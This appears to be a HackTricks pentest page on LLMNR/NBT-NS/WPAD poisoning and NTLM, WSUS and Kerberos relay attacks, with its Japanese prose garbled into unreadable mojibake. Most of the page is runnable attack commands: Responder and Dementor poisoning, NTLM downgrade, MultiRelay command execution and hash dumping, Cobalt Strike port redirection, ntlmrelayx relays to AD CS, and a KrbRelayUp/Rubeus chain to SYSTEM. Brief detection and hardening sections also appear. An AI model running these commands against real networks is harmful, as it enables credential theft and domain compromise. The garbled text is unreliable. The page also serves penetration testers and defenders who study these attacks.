LLMNR, NBT-NS, mDNS/DNS ãš WPAD ã®ãªãããŸãããã³ãªã¬ãŒæ»æ
Tip
AWSãããã³ã°ãåŠã³ãå®è·µããïŒ
HackTricks Training AWS Red Team Expert (ARTE)
GCPãããã³ã°ãåŠã³ãå®è·µããïŒHackTricks Training GCP Red Team Expert (GRTE)
Azureãããã³ã°ãåŠã³ãå®è·µããïŒ
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricksããµããŒããã
- ãµãã¹ã¯ãªãã·ã§ã³ãã©ã³ã確èªããŠãã ããïŒ
- **ð¬ Discordã°ã«ãŒããŸãã¯ãã¬ã°ã©ã ã°ã«ãŒãã«åå ããããTwitter ðŠ @hacktricks_liveããã©ããŒããŠãã ããã
- HackTricksããã³HackTricks Cloudã®GitHubãªããžããªã«PRãæåºããŠãããã³ã°ããªãã¯ãå ±æããŠãã ããã
ãããã¯ãŒã¯ãããã³ã«
ããŒã«ã«ãã¹ãå解決ãããã³ã«
- LLMNR, NBT-NS, and mDNS:
- Microsoft ããã®ä»ã® OS 㯠DNS ã倱æããå Žåã«ããŒã«ã«å解決ã®ããã« LLMNR ãš NBT-NS ã䜿çšããŸããApple ã Linux ç³»ã¯åæ§ã« mDNS ã䜿çšããŸãã
- ãããã®ãããã³ã«ã¯èªèšŒããªã UDP ãããŒããã£ã¹ãã§åäœãããããååããªãããŸãã«è匱ã§ãã
- Responder ããã³ Dementor ã¯ããããã®ãããã³ã«ãåãåããããã¹ãã«åœã®å¿çãéãããšã§ãµãŒãã¹ã«ãªãããŸãããã«äœ¿çšã§ããŸãã
- Responder ã䜿ã£ããµãŒãã¹ãªãããŸãã®è©³çŽ°ã¯ here ãåç §ããŠãã ããã
Web Proxy Auto-Discovery Protocol (WPAD)
- WPAD ã¯ãã©ãŠã¶ããããã·èšå®ãèªåçã«æ€åºããããšãå¯èœã«ããŸãã
- æ€åºã¯ DHCPãDNS ãä»ããŠè¡ãããDNS ã倱æããå Žå㯠LLMNR ãš NBT-NS ã«ãã©ãŒã«ããã¯ããŸãã
- Responder 㯠WPAD æ»æãèªååããã¯ã©ã€ã¢ã³ããæªæã®ãã WPAD ãµãŒãã«èªå°ã§ããŸãã
Responder/Dementor ã«ãããããã³ã«ãã€ãºãã³ã°
-
Responder 㯠LLMNRãNBT-NSãmDNS ã¯ãšãªããã€ãºãã³ã°ããããŒã«ã§ãã¯ãšãªçš®å¥ã«å¿ããŠéžæçã«å¿çãã䞻㫠SMB ãµãŒãã¹ãã¿ãŒã²ããã«ããŸãã
-
Kali Linux ã«ããªã€ã³ã¹ããŒã«ãããŠããã
/etc/responder/Responder.confã§èšå®å¯èœã§ãã -
Responder ã¯ååŸããããã·ã¥ãç»é¢ã«è¡šç€ºãã
/usr/share/responder/logsã«ä¿åããŸãã -
IPv4 ãš IPv6 ã®äž¡æ¹ããµããŒãããŸãã
-
Responder ã® Windows ç㯠here ããå ¥æã§ããŸãã
-
Dementor ã¯ãã«ããã£ã¹ããã€ãºãã³ã°ã®æ©èœãæ¡åŒµããããã«æªæã®ãããµãŒãã¹ãããã€ããšããŠåäœããŸãïŒCUPS RCE ãµããŒããå«ãïŒã
-
å šäœæ§æã¯ Responder ã«äŒŒãŠããŸããããã现ããªèšå®ãå¯èœã§ããïŒããã©ã«ãã¯: Dementor.tomlïŒ
-
Dementor ãš Responder ã®äºææ§ã«ã€ããŠã¯æ¬¡ãåç §: Compatibility Matrix
-
玹ä»ãšããã¥ã¡ã³ã: Dementor - Docs
-
Responder ãäžéšãããã³ã«ã§åŒãèµ·ãããã£ããã£åé¡ãä¿®æ£ããŸãã
Responder ã®å®è¡
- ããã©ã«ãèšå®ã§ Responder ãå®è¡ããã«ã¯:
responder -I <Interface> - ããç©æ¥µçãªãããŒãïŒå¯äœçšã®å¯èœæ§ããïŒ:
responder -I <Interface> -P -r -v - NTLMv1 ãã£ã¬ã³ãž/ã¬ã¹ãã³ã¹ãååŸããŠç Žãããã®ææ³:
responder -I <Interface> --lm --disable-ess - WPAD ãªãããŸããæå¹ã«ãã:
responder -I <Interface> --wpad - NetBIOS ãªã¯ãšã¹ããæ»æè
ã® IP ã«è§£æ±ºããèªèšŒãããã·ãç«ãŠã:
responder.py -I <interface> -Pv
Dementor ã®å®è¡
- ããã©ã«ãèšå®ã§å®è¡:
Dementor -I <interface> - ããã©ã«ãèšå®ã®ãŸãŸè§£æã¢ãŒãã§:
Dementor -I <interface> -A - èªå NTLM ã»ãã·ã§ã³ããŠã³ã°ã¬ãŒã (ESS):
Dementor -I <interface> -O NTLM.ExtendedSessionSecurity=Off - ã«ã¹ã¿ã èšå®ã§çŸåšã®ã»ãã·ã§ã³ãå®è¡:
Dementor -I <interface> --config <file.toml>
Responder ã䜿ã£ã DHCP ãã€ãºãã³ã°
- DHCP å¿çãåœè£ ãããšè¢«å®³è ã®ã«ãŒãã£ã³ã°æ å ±ãæä¹ çã«æ±æã§ããARP ãã€ãºãã³ã°ããã¹ãã«ã¹ãªä»£æ¿ææ®µãšãªããŸãã
- ã¿ãŒã²ãããããã¯ãŒã¯ã®æ§æãæ£ç¢ºã«ææ¡ããŠããããšãå¿ èŠã§ãã
- æ»æã®å®è¡:
./Responder.py -I eth0 -Pdv - ãã®ææ³ã¯ NTLMv1/2 ããã·ã¥ã广çã«ååŸã§ããŸããããããã¯ãŒã¯é害ãé¿ããããæ éã«æ±ãå¿ èŠããããŸãã
Responder/Dementor ã«ããèªèšŒæ å ±ã®ååŸ
- Responder/Dementor ã¯åè¿°ã®ãããã³ã«ã䜿ã£ãŠãµãŒãã¹ã«ãªãããŸãããŠãŒã¶ãåœè£ ãµãŒãã¹ã«å¯ŸããŠèªèšŒã詊ã¿ãéã«èªèšŒæ å ±ïŒé垞㯠NTLMv2 Challenge/ResponseïŒãååŸããŸãã
- èªèšŒæ å ±ãè§£æããããããããã« NetNTLMv1 ãžã®ããŠã³ã°ã¬ãŒãã ESS ã®ç¡å¹åã詊ã¿ãããšããããŸãã
ãããã®æè¡ã¯æ³çãã€å«ççã«ãé©åãªèš±å¯ãåŸãäžã§äœ¿çšããç¡èš±å¯ã®ã¢ã¯ã»ã¹ãæ¥å劚害ãé¿ããããšãéèŠã§ãã
Inveigh
Inveigh 㯠Windows ã·ã¹ãã åãã«èšèšãããããããã¬ãŒã·ã§ã³ãã¹ã¿ãŒããã³ã¬ããããŒã åãã®ããŒã«ã§ããResponder ãšåæ§ã®æ©èœãæäŸããspoofing ãš man-in-the-middle attacks ãå®è¡ããŸããããŒã«ã¯ PowerShell ã¹ã¯ãªãããã C# ãã€ããªãžãšé²åããŠãããäž»ãªããŒãžã§ã³ã«ã¯ Inveigh ãš InveighZero ããããŸãã詳现ãªãã©ã¡ãŒã¿ãšæé 㯠wiki ãåç §ããŠãã ããã
Inveigh 㯠PowerShell ãéããŠæäœã§ããŸã:
Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y
ãŸã㯠C# ãã€ããªãšããŠå®è¡ïŒ
Inveigh.exe
NTLM Relay Attack
ãã®æ»æã¯ SMB èªèšŒã»ãã·ã§ã³ãæªçšããŠã¿ãŒã²ãããã·ã³ãžã¢ã¯ã»ã¹ããæåããã° ã·ã¹ãã ã·ã§ã« ãååŸããŸããäž»ãªåææ¡ä»¶ã¯æ¬¡ã®ãšããã§ã:
- èªèšŒãŠãŒã¶ã¯ããªã¬ã€å ãã¹ãäžã§ Local Admin ã¢ã¯ã»ã¹ãæã£ãŠããå¿ èŠããããŸãã
- SMB signing ãç¡å¹ã«ãªã£ãŠããå¿ èŠããããŸãã
445 ããŒãã®è»¢éãšãã³ããªã³ã°
çŽæ¥ãããã¯ãŒã¯å°å ¥ãäžå¯èœãªã·ããªãªã§ã¯ãããŒã445ã®ãã©ãã£ãã¯ã転éããã³ãã³ãã«ããå¿ èŠããããŸããPortBender ã®ãããªããŒã«ã¯ãããŒã445ã®ãã©ãã£ãã¯ãå¥ã®ããŒãã«ãªãã€ã¬ã¯ãããã®ã«åœ¹ç«ã¡ãŸããããã¯ãLocal Admin ã¢ã¯ã»ã¹ããã driver loading ãå¯èœãªå Žåã«äžå¯æ¬ ã§ãã
Cobalt Strike ã§ã® PortBender ã®ã»ããã¢ãããšæäœ:
Cobalt Strike -> Script Manager -> Load (Select PortBender.cna)
beacon> cd C:\Windows\system32\drivers # Navigate to drivers directory
beacon> upload C:\PortBender\WinDivert64.sys # Upload driver
beacon> PortBender redirect 445 8445 # Redirect traffic from port 445 to 8445
beacon> rportfwd 8445 127.0.0.1 445 # Route traffic from port 8445 to Team Server
beacon> socks 1080 # Establish a SOCKS proxy on port 1080
# Termination commands
beacon> jobs
beacon> jobkill 0
beacon> rportfwd stop 8445
beacon> socks stop
NTLM Relay Attack ã®ãã®ä»ã®ããŒã«
- Metasploit: proxiesãããŒã«ã«ããã³ãªã¢ãŒããã¹ãã®è©³çްãèšå®ããŠäœ¿çšããŸãã
- smbrelayx: SMB ã»ãã·ã§ã³ãäžç¶ããã³ãã³ãå®è¡ãããã¯ãã¢å±éãè¡ã Python ã¹ã¯ãªããã§ãã
- MultiRelay: Responder ã¹ã€ãŒãã®ããŒã«ã§ãç¹å®ãŠãŒã¶ãŒãŸãã¯å šãŠãŒã¶ãŒãäžç¶ããã³ãã³ããå®è¡ãããããã·ã¥ããã³ããããããŸãã
å¿ èŠã«å¿ããŠåããŒã«ã¯ SOCKS proxy çµç±ã§åäœããããèšå®ã§ãã鿥çãªãããã¯ãŒã¯çµè·¯ã§ãæ»æãè¡ããŸãã
MultiRelay ã®æäœ
MultiRelay 㯠/usr/share/responder/tools ãã£ã¬ã¯ããªããå®è¡ãããç¹å®ã® IP ããŠãŒã¶ãŒã察象ãšããŸãã
python MultiRelay.py -t <IP target> -u ALL # Relay all users
python MultiRelay.py -t <IP target> -u ALL -c whoami # Execute command
python MultiRelay.py -t <IP target> -u ALL -d # Dump hashes
# Proxychains for routing traffic
ãããã®ããŒã«ãšææ³ã¯ãããŸããŸãªãããã¯ãŒã¯ç°å¢ã§ã® NTLM Relay æ»æãå®è¡ããããã®å æ¬çãªã»ããã圢æããŸãã
Abusing WSUS HTTP (8530) for NTLM Relay to LDAP/SMB/AD CS (ESC8)
WSUS ã¯ã©ã€ã¢ã³ã㯠NTLM ã䜿ã£ãŠã¢ããããŒããµãŒããŒã«èªèšŒããŸãïŒHTTP 8530 ãŸã㯠HTTPS 8531ïŒãHTTP ãæå¹ãªå Žåãã¯ã©ã€ã¢ã³ãã®å®æçãªãã§ãã¯ã€ã³ãããŒã«ã«ã»ã°ã¡ã³ãã§åŒ·å¶ãŸãã¯ååããntlmrelayx ã§ LDAP/LDAPS/SMB ã AD CS ã® HTTP ãšã³ããã€ã³ãïŒESC8ïŒã«ãªã¬ãŒã§ããŸããããã·ã¥ãã¯ã©ãã¯ããå¿ èŠã¯ãããŸãããããã¯éåžžã®ã¢ããããŒããã©ãã£ãã¯ã«æº¶ã蟌ã¿ãæ©æ¢°ã¢ã«ãŠã³ãèªèšŒïŒHOST$ïŒãåŸãããããšããããããŸãã
What to look for
- GPO/registry èšå®ïŒHKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate ãš âŠ\WindowsUpdate\AU ã®äžïŒ:
- WUServer (äŸ: http://wsus.domain.local:8530)
- WUStatusServer (ã¬ããŒã URL)
- UseWUServer (1 = WSUS; 0 = Microsoft Update)
- DetectionFrequencyEnabled ãš DetectionFrequency (hours)
- ã¯ã©ã€ã¢ã³ãã HTTP ã§äœ¿çšãã WSUS SOAP ãšã³ããã€ã³ã:
- /ClientWebService/client.asmx (approvals)
- /ReportingWebService/reportingwebservice.asmx (status)
- ããã©ã«ãããŒã: 8530/tcp HTTP, 8531/tcp HTTPS
Reconnaissance
- Unauthenticated
- ãªã¹ããŒãã¹ãã£ã³: nmap -sSVC -Pn âopen -p 8530,8531 -iL
- L2 MITM ã§ HTTP WSUS ãã©ãã£ãã¯ãã¹ãããã£ã³ã°ããwsusniff.py ã§ã¢ã¯ãã£ããªã¯ã©ã€ã¢ã³ã/ãšã³ããã€ã³ããèšé²ïŒTLS èšŒææžãã¯ã©ã€ã¢ã³ãã«ä¿¡é Œãããããå Žåãé€ã HTTP ã®ã¿ïŒã
- Authenticated
- SYSVOL ã® GPO ã MANSPIDER + regpol ã§è§£æã㊠WSUS ããŒãæ¢ãïŒwsuspider.sh ã©ãããŒã¯ WUServer/WUStatusServer/UseWUServer ãèŠçŽããŸãïŒã
- ãã¹ãããã¹ã±ãŒã«ã§ãšã³ããã€ã³ããã¯ãšãªãããããŒã«ã«ã§:
nxc smb
-u -p -M reg-query -o PATH=âHKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdateâ KEY=âWUServerâ reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate
End-to-end HTTP relay steps
-
MITM ã®äœçœ®åãïŒåäž L2ïŒãããŠã¯ã©ã€ã¢ã³ãã WSUS ãµãŒããŒãããªãã«è§£æ±ºããããã«ããïŒARP/DNS poisoningãBettercapãmitm6 ãªã©ïŒãarpspoof ã®äŸ: arpspoof -i
-t <wsus_client_ip> <wsus_server_ip> -
ããŒã 8530 ããªã¬ãŒãªã¹ããŒã«ãªãã€ã¬ã¯ãïŒä»»æã䟿å©ïŒ: iptables -t nat -A PREROUTING -p tcp âdport 8530 -j REDIRECT âto-ports 8530 iptables -t nat -L PREROUTING âline-numbers
-
HTTP ãªã¹ããŒã§ ntlmrelayx ãèµ·åïŒHTTP ãªã¹ããŒã¯ Impacket ã®ãµããŒããå¿ èŠ; äžã® PR ãåç §ïŒ: ntlmrelayx.py -t ldap://
-smb2support -socks âkeep-relaying âhttp-port 8530
ãã®ä»ã®äžè¬çãªã¿ãŒã²ãã:
- SMB ã«ãªã¬ãŒã㊠exec/dumpïŒçœ²åãªãã®å ŽåïŒ: -t smb://
- LDAPS ã«ãªã¬ãŒããŠãã£ã¬ã¯ããªã®å€æŽïŒäŸ: RBCDïŒ: -t ldaps://
- AD CS Web enrollmentïŒESC8ïŒã«ãªã¬ãŒããŠèšŒææžãçºè¡ãããã®åŸ Schannel/PKINIT ã§èªèšŒ:
ntlmrelayx.py âhttp-port 8530 -t http://
/certsrv/certfnsh.asp âadcs âno-http-server AD CS ã®æ·±ãæªçšçµè·¯ãšããŒã«ã«ã€ããŠã¯ AD CS ããŒãžãåç §ããŠãã ãã:
-
ã¯ã©ã€ã¢ã³ãã®ãã§ãã¯ã€ã³ãããªã¬ãŒãããã¹ã±ãžã¥ãŒã«ãåŸ ã€ãã¯ã©ã€ã¢ã³ããã: wuauclt.exe /detectnow ãŸã㯠Windows Update UIïŒCheck for updatesïŒã䜿çšã
-
èªèšŒæžã¿ã® SOCKS ã»ãã·ã§ã³ã䜿ãïŒ-socks ãæå®ããå ŽåïŒããçŽæ¥ã®ãªã¬ãŒçµæããã¹ããšã¯ã¹ããã€ãã«å©çšïŒLDAP ã®å€æŽãSMB æäœããŸãã¯åŸã§èªèšŒã«äœ¿ãããã® AD CS èšŒææžçºè¡ïŒã
HTTPS constraint (8531)
- WSUS ã HTTPS ã§ããã·ãã«ååããããšã¯ãã¯ã©ã€ã¢ã³ããããªãã®èšŒææžãä¿¡é Œããå Žåãé€ã广ããããŸãããä¿¡é ŒãããèšŒææžãä»ã® TLS ãã¬ã€ã¯ããªãéããWSUS HTTPS ãã©ãã£ãã¯ãã NTLM ãã³ãã·ã§ã€ã¯ãååŸïŒãªã¬ãŒããããšã¯ã§ããŸããã
Notes
- WSUS ã¯éæšå¥šãšçºè¡šãããŸããããåºãå±éãããŠããŸããHTTP (8530) ã¯å€ãã®ç°å¢ã§äŸç¶ãšããŠäžè¬çã§ãã
- æçšãªãã«ããŒ: wsusniff.pyïŒHTTP WSUS ã®ãã§ãã¯ã€ã³èгå¯ïŒãwsuspider.shïŒGPO ãã WUServer/WUStatusServer ãåæïŒãNetExec reg-queryïŒã¹ã±ãŒã«ã§ã®ã¯ãšãªïŒã
- Impacket 㯠PR #2034 ã§ ntlmrelayx ã® HTTP ãªã¹ããŒãµããŒãã埩å ããŸããïŒå 㯠PR #913 ã§è¿œå ïŒã
Force NTLM Logins
Windows ã§ã¯ãäžéšã®ç¹æš©ã¢ã«ãŠã³ããä»»æã®ãã·ã³ã«å¯ŸããŠèªèšŒãããããšãã§ããå ŽåããããŸããè©³çŽ°ã¯æ¬¡ã®ããŒãžãèªãã§ãã ãã:
Force NTLM Privileged Authentication
Kerberos Relay attack
A Kerberos relay attack ã¯ããããµãŒãã¹ãã AP-REQ ticket ãçã¿ãåã computer-account key ãå
±æããå¥ã®ãµãŒãã¹ã«å¯ŸããŠåå©çšããŸãïŒäž¡æ¹ã® SPN ãåã $ ãã·ã³ã¢ã«ãŠã³ãã«èšå®ãããŠããããïŒããã㯠SPN ã® service class ãç°ãªã£ãŠããŠãïŒäŸ: CIFS/ â LDAP/ïŒåäœããŸãããªããªããã±ããã埩å·ããéµã¯ SPN æååèªèº«ã§ã¯ãªããã·ã³ã® NT ããã·ã¥ã§ãããSPN æååèªäœã¯çœ²åã®äžéšã§ã¯ãªãããã§ãã
NTLM relay ãšç°ãªãããã®ããã㯠åäžãã¹ãå ã«éå®ãããŸãããLDAP ã«æžã蟌ãããããã³ã«ãã¿ãŒã²ããã«ããã° Resource-Based Constrained Delegation (RBCD) ã AD CS enrollment ã«ãã§ã€ã³ããŠãäžçºã§ NT AUTHORITY\SYSTEM ãåãããšãã§ããŸãã
ãã®æ»æã®è©³çްã«ã€ããŠã¯ä»¥äžãåç §ããŠãã ãã:
-
https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html
-
https://decoder.cloud/2025/04/24/from-ntlm-relay-to-kerberos-relay-everything-you-need-to-know/
-
- Kerberos basics
| Token | Purpose | Relay relevance |
|---|---|---|
| TGT / AS-REQ â REP | ãŠãŒã¶ãŒã KDC ã«èšŒæãã | untouched |
| Service ticket / TGS-REQ â REP | åäžã® SPN ã«ãã€ã³ããããïŒSPN ææè ã®ããŒã§æå·åããã | SPN ãåãã¢ã«ãŠã³ãã«ããã°çžäºã«çœ®ãæãå¯èœ |
| AP-REQ | ã¯ã©ã€ã¢ã³ãããµãŒãã¹ã« TGS ãéã | æã ãçãã§ãªãã¬ã€ãããã® |
- ãã±ãã㯠SPN ãææããã¢ã«ãŠã³ãã®ãã¹ã¯ãŒã掟çéµ ã§æå·åãããŸãã
- AP-REQ å ã® Authenticator ã«ã¯ 5 åã®ã¿ã€ã ã¹ã¿ã³ããããããã®ãŠã£ã³ããŠå ã®ãªãã¬ã€ã¯ãµãŒãã¹ã®ãã£ãã·ã¥ãéè€ãæ€åºãããŸã§æå¹ã§ãã
- Windows ã¯ãã±ããå
ã® SPN æååãã¢ã¯ã»ã¹ãããµãŒãã¹ãšäžèŽããŠãããã確èªããããšããŸãã§ãéåžž
CIFS/HOSTçšã®ãã±ããã¯LDAP/HOSTã§ãæ£åžžã«åŸ©å·ãããŸãã
-
- Kerberos ããªã¬ãŒããããã«æºããã¹ãæ¡ä»¶
- å ±æããŒ: ãœãŒã¹ãšã¿ãŒã²ããã® SPN ãåãã³ã³ãã¥ãŒã¿ã¢ã«ãŠã³ãã«å±ããŠããããšïŒWindows ãµãŒããŒã®ããã©ã«ãïŒã
- ãã£ãã«ä¿è·ãªã: SMB/LDAP ã®çœ²åãªããHTTP/LDAPS ã® EPA ãªãã
- èªèšŒãååãŸãã¯åŒ·å¶ã§ããããš: LLMNR/NBNS poisonãDNS spoofãPetitPotam / DFSCoerce RPCãfake AuthIPãrogue DCOM ãªã©ã
- ãã±ããå ãæ¢ã«äœ¿ãããŠããªãããš: å®ãã±ãããå°éããåã«ç«¶äºã«åã€ãå®å šã«ãããã¯ããããããªããšãµãŒããŒã®ãªãã¬ã€ãã£ãã·ã¥ã Event 4649 ãçºçãããã
- éä¿¡ã«ãããŠäœããã®åœ¢ã§ MitM ãè¡ããããšïŒäŸ: ãã¡ã€ã³ã® DNS ã倿Žã§ãã DNSAmins ã°ã«ãŒãã®äžå¡ã§ãããã被害è ã® HOST ãã¡ã€ã«ã倿Žã§ãããªã©ïŒã
Kerberos Relay Steps
- 3.1 Recon the host
# find servers where HTTP, LDAP or CIFS share the same machine account
Get-ADComputer -Filter * -Properties servicePrincipalName |
Where-Object {$_.servicePrincipalName -match '(HTTP|LDAP|CIFS)'} |
Select Name,servicePrincipalName
- 3.2 ãªã¬ãŒãªã¹ããŒãèµ·åãã
# one-click local SYSTEM via RBCD
.\KrbRelayUp.exe relay --spn "ldap/DC01.lab.local" --method rbcd --clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8
KrbRelayUp 㯠KrbRelay â LDAP â RBCD â Rubeus â SCM bypass ã1ã€ã®ãã€ããªã«ãŸãšããŸãã
- 3.3 Coerce Kerberos auth
# coerce DC to auth over SMB with DFSCoerce
.\dfscoerce.exe --target \\DC01.lab.local --listener 10.0.0.50
DFSCoerce 㯠DC ã« Kerberos CIFS/DC01 ãã±ãããéãããã
- 3.4 AP-REQ ããªã¬ãŒãã
KrbRelay 㯠SMB ãã GSS blob ãæœåºããããã LDAP bind ã«å梱å
ã㊠ldap://DC01 ã«è»¢éãã â èªèšŒã¯ åãéµ ã§åŸ©å·ã§ããããæåããã
- 3.5 LDAP â RBCD â SYSTEM ãæªçšãã
# (auto inside KrbRelayUp) manual for clarity
New-MachineAccount -Name "FAKE01" -Password "P@ss123"
KrbRelay.exe -spn ldap/DC01 -rbcd FAKE01_SID
Rubeus s4u /user:FAKE01$ /rc4:<hash> /impersonateuser:administrator /msdsspn:HOST/DC01 /ptt
SCMUACBypass.exe
ããªãã¯çŸåš NT AUTHORITY\SYSTEM ãææããŠããŸãã
ç¥ã£ãŠããã¹ãä»ã®ãã¹
| ãã¯ã¿ãŒ | ããªã㯠| ãªãéèŠã |
|---|---|---|
| AuthIP / IPSec | åœã®ãµãŒããŒãä»»æã® SPN ã䜿ã£ã GSS-ID payload ãéä¿¡ããïŒã¯ã©ã€ã¢ã³ãã¯çŽæ¥ããªãå®ãŠã« AP-REQ ãæ§ç¯ãã | ãµããããéã§ãåäœããïŒããã©ã«ãã§ machine creds ãäœ¿çš |
| DCOM / MSRPC | æªæãã OXID resolver ãã¯ã©ã€ã¢ã³ãã«ä»»æã® SPN ãšããŒããžèªèšŒããã | çŽç²ãªããŒã«ã« priv-escïŒãã¡ã€ã¢ãŠã©ãŒã«ãåé¿ |
| AD CS Web Enroll | ãã·ã³ãã±ããã HTTP/CA ã«ãªã¬ãŒããŠèšŒææžãååŸãããã®åŸ PKINIT ã§ TGT ãçºè¡ãã | LDAP signing ã®é²åŸ¡ãåé¿ãã |
| Shadow Credentials | msDS-KeyCredentialLink ãæžã蟌ã¿ãåœé ã㌠ãã¢ã§ PKINIT ãè¡ã | ã³ã³ãã¥ãŒã¿ã¢ã«ãŠã³ãã远å ããå¿ èŠããªã |
ãã©ãã«ã·ã¥ãŒãã£ã³ã°
| ãšã©ãŒ | æå³ | å¯ŸåŠ |
|---|---|---|
KRB_AP_ERR_MODIFIED | ãã±ããã㌠â ã¿ãŒã²ããã㌠| ãã¹ã/SPN ãééã£ãŠãã |
KRB_AP_ERR_SKEW | ã¯ããã¯å·®ã 5 åä»¥äž | æå»ãåæããã w32tm ã䜿çšãã |
| LDAP bind fails | 眲åã匷å¶ãããŠãã | AD CS çµè·¯ã䜿ãã眲åãç¡å¹ã«ãã |
| Event 4649 spam | ãµãŒãã¹ãéè€ãã Authenticator ãæ€åºãã | ãªãªãžãã«ãã±ããããããã¯ãããã¬ãŒã¹ãã |
æ€åº
- çæéå
ã«åäžãœãŒã¹ãã
CIFS/,HTTP/,LDAP/ã«å¯Ÿãã Event 4769 ã®æ¥å¢ã - ãµãŒãã¹äžã® Event 4649 ã¯ãªãã¬ã€ãæ€åºãããããšã瀺ãã
- 127.0.0.1 ããã® Kerberos ãã°ãªã³ïŒããŒã«ã« SCM ãžã®ãªã¬ãŒïŒã¯éåžžã«çããã â KrbRelayUp ããã¥ã¡ã³ãå ã® Sigma ã«ãŒã«ã§ãããã³ã°ããã
msDS-AllowedToActOnBehalfOfOtherIdentityãmsDS-KeyCredentialLink屿§ã®å€æŽãç£èŠããã
ããŒããã³ã°
- ãã¹ãŠã®ãµãŒããŒã§ LDAP & SMB signing + EPA ã匷å¶ããã
- Split SPNs ã«ãã HTTP ã CIFS/LDAP ãšåãã¢ã«ãŠã³ãã«ãªããªãããã«ããã
- coercion ãã¯ã¿ãŒããããããïŒPetitPotam KB5005413ãDFSãAuthIPïŒã
- äžæ£ãªã³ã³ãã¥ãŒã¿ã®åå ãæ¢ãããã
ms-DS-MachineAccountQuota = 0ãèšå®ããã - Event 4649 ãšäºæããªãã«ãŒããã㯠Kerberos ãã°ãªã³ã«ã€ããŠã¢ã©ãŒããåºãã
References
- https://intrinium.com/smb-relay-attack-tutorial/
- https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/
- https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/
- https://intrinium.com/smb-relay-attack-tutorial/
- https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html
- WSUS Is SUS: NTLM Relay Attacks in Plain Sight (TrustedSec)
- GoSecure â Abusing WSUS to enable NTLM relaying attacks
- Impacket PR #2034 â Restore HTTP server in ntlmrelayx
- Impacket PR #913 â HTTP relay support
- WSUScripts â wsusniff.py
- WSUScripts â wsuspider.sh
- MS-WSUSOD â Windows Server Update Services: Server-to-Client Protocol
- Microsoft â WSUS deprecation announcement
Tip
AWSãããã³ã°ãåŠã³ãå®è·µããïŒ
HackTricks Training AWS Red Team Expert (ARTE)
GCPãããã³ã°ãåŠã³ãå®è·µããïŒHackTricks Training GCP Red Team Expert (GRTE)
Azureãããã³ã°ãåŠã³ãå®è·µããïŒ
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricksããµããŒããã
- ãµãã¹ã¯ãªãã·ã§ã³ãã©ã³ã確èªããŠãã ããïŒ
- **ð¬ Discordã°ã«ãŒããŸãã¯ãã¬ã°ã©ã ã°ã«ãŒãã«åå ããããTwitter ðŠ @hacktricks_liveããã©ããŒããŠãã ããã
- HackTricksããã³HackTricks Cloudã®GitHubãªããžããªã«PRãæåºããŠãããã³ã°ããªãã¯ãå ±æããŠãã ããã


